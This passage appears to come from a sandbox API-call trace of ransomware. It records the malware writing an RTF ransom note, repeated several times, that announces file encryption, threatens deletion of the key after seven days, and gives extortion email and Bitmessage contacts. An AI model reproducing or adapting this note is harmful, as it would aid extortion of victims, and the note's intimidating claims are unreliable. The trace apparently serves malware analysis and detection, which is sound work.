use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n0055\x1eQX@£ºñÃJÞ9\x87\x877æG(ÊJ\x03Þ", lpUsedDefaultChar=0x0) returned 8717 [0242.817] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0242.818] CloseHandle (hObject=0x2f4) returned 1 [0242.818] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0242.818] GetLastError () returned 0x2 [0242.818] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0257.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0257.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 